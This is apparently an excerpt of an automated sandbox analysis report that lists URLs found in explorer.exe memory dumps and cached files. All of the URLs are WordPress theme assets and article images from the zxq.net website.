Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/icons/icons.css?ver=7.1.1
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/lightbox.css?ver=7.1.1
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/jquery.mfp-lightbox.js?ver=7.1.1
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.js?ver=7.1.1
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/lazyload.js?ver=7.1.1
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/js/theme.js?ver=7.1.1
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/style.css?ver=7.1.1
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/ZXQ-FB.png
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/ZXQ.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/zxq-icon-150x150.png
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/02/zxq-icon-300x300.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-150x58.png
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-300x117.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-450x175.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black.png
Source: explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/0
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/4-Tips-for-Solo-Living-in-a-Condo-1024x576.jpg
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/4-Tips-for-Solo-Living-in-a-Condo-150x84.jpg
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/4-Tips-for-Solo-Living-in-a-Condo-300x169.jpg
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/4-Tips-for-Solo-Living-in-a-Condo-450x253.jpg
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/4-Tips-for-Solo-Living-in-a-Condo-768x432.jpg
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/4-Tips-for-Solo-Living-in-a-Condo.jpg
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/AI-Agent-Crypto-Tokens-in-2025-Navigating-the-Hype-and-Re
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Condo-Design-Ideas-for-a-Conducive-Work-Environment-1024x
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Condo-Design-Ideas-for-a-Conducive-Work-Environment-150x8
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Condo-Design-Ideas-for-a-Conducive-Work-Environment-300x1
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Condo-Design-Ideas-for-a-Conducive-Work-Environment-450x2
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Condo-Design-Ideas-for-a-Conducive-Work-Environment-768x4
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Condo-Design-Ideas-for-a-Conducive-Work-Environment.jpg
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Experience-Luxury-Living-at-Marina-Gardens-Condo-The-One-
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Final-Mile-Delivery-The-Key-to-Winning-Customer-Satisfact
